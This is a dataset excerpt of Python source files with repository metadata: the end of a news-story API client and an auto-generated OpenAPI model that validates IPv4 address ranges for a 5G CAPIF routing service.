"""
self.articleUrisSortBy = sortBy
self.articleUrisSortByAsc = sortByAsc
self.resultType = "articleUris"
class RequestStoryArticleTrend(RequestStory):
"""
return trending information for the articles about the story
"""
def __init__(self,
lang = mainLangs,
minArticleCosSim = -1,
returnInfo = ReturnInfo(articleInfo = ArticleInfoFlags(bodyLen = 0))):
self.resultType = "articleTrend"
self.articleTrendLang = lang
self.articleTrendMinArticleCosSim = minArticleCosSim
self.__dict__.update(returnInfo.getParams("articleTrend"))
class RequestStorySimilarStories(RequestStory):
"""
compute and return a list of similar stories
@param conceptInfoList: array of concepts and their importance, e.g. [{ "uri": "http://en.wikipedia.org/wiki/Barack_Obama", "wgt": 100 }, ...]
@param count: number of similar stories to return (at most 50)
@param dateStart: what can be the oldest date of the similar stories
@param dateEnd: what can be the newest date of the similar stories
@param addArticleTrendInfo: for the returned stories compute how they were trending (intensity of reporting) in different time periods
@param aggrHours: time span that is used as a unit when computing the trending info
@param returnInfo: what details should be included in the returned information
"""
def __init__(self,
conceptInfoList,
count=50, # number of similar stories to return
dateStart = None, # what can be the oldest date of the similar stories
dateEnd = None, # what can be the newest date of the similar stories
lang = [],
returnInfo = ReturnInfo()):
assert count <= 50
assert isinstance(conceptInfoList, list)
self.action = "getSimilarStories"
self.concepts = json.dumps(conceptInfoList)
self.storiesCount = count
if dateStart != None:
self.dateStart = QueryParamsBase.encodeDate(dateStart)
if dateEnd != None:
self.dateEnd = QueryParamsBase.encodeDate(dateEnd)
if len(lang) > 0:
self.lang = lang
# setting resultType since we have to, but it's actually ignored on the backend
self.resultType = "similarStories"
self.__dict__.update(returnInfo.getParams("similarStories"))
|
[
"gleban@gmail.com"
] |
gleban@gmail.com
|
f5c72b1f3b8cbbe42360e74a8ca4056e885d0bab
|
ec760cb774a45a12d40529036b7fca3dd589223c
|
/services/TS29222_CAPIF_Routing_Info_API/capif_routing_info/models/ipv4_address_range.py
|
8bf453284830c0d9696da8ccd2b8deea4ae98178
|
[
"Apache-2.0"
] |
permissive
|
EVOLVED-5G/CAPIF_API_Services
|
e4d7f8c7fc9a69aa364787471c5bd54d51fd1cb8
|
c907c68d54adf3e3ad7be15ac6707b8c64a1b778
|
refs/heads/develop
| 2023-07-29T09:31:23.176795
| 2023-05-31T12:56:33
| 2023-05-31T12:56:33
| 416,657,882
| 15
| 5
|
Apache-2.0
| 2023-09-04T12:01:57
| 2021-10-13T08:46:52
|
Python
|
UTF-8
|
Python
| false
| false
| 3,479
|
py
|
# coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from capif_routing_info.models.base_model_ import Model
import re
from capif_routing_info import util
import re # noqa: E501
class Ipv4AddressRange(Model):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
"""
def __init__(self, start=None, end=None): # noqa: E501
"""Ipv4AddressRange - a model defined in OpenAPI
:param start: The start of this Ipv4AddressRange. # noqa: E501
:type start: str
:param end: The end of this Ipv4AddressRange. # noqa: E501
:type end: str
"""
self.openapi_types = {
'start': str,
'end': str
}
self.attribute_map = {
'start': 'start',
'end': 'end'
}
self._start = start
self._end = end
@classmethod
def from_dict(cls, dikt) -> 'Ipv4AddressRange':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The Ipv4AddressRange of this Ipv4AddressRange. # noqa: E501
:rtype: Ipv4AddressRange
"""
return util.deserialize_model(dikt, cls)
@property
def start(self):
"""Gets the start of this Ipv4AddressRange.
String identifying a IPv4 address formatted in the \"dotted decimal\" notation as defined in RFC 1166. # noqa: E501
:return: The start of this Ipv4AddressRange.
:rtype: str
"""
return self._start
@start.setter
def start(self, start):
"""Sets the start of this Ipv4AddressRange.
String identifying a IPv4 address formatted in the \"dotted decimal\" notation as defined in RFC 1166. # noqa: E501
:param start: The start of this Ipv4AddressRange.
:type start: str
"""
if start is not None and not re.search(r'^(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])$', start): # noqa: E501
raise ValueError("Invalid value for `start`, must be a follow pattern or equal to `/^(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])$/`") # noqa: E501
self._start = start
@property
def end(self):
"""Gets the end of this Ipv4AddressRange.
String identifying a IPv4 address formatted in the \"dotted decimal\" notation as defined in RFC 1166. # noqa: E501
:return: The end of this Ipv4AddressRange.
:rtype: str
"""
return self._end
@end.setter
def end(self, end):
"""Sets the end of this Ipv4AddressRange.
String identifying a IPv4 address formatted in the \"dotted decimal\" notation as defined in RFC 1166. # noqa: E501
:param end: The end of this Ipv4AddressRange.
:type end: str
"""
if end is not None and not re.search(r'^(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])$', end): # noqa: E501
raise ValueError("Invalid value for `end`, must be a follow pattern or equal to `/^(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])$/`") # noqa: E501
self._end = end
|
[
"jorge.moratinossalcines@telefonica.com"
] |
jorge.moratinossalcines@telefonica.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.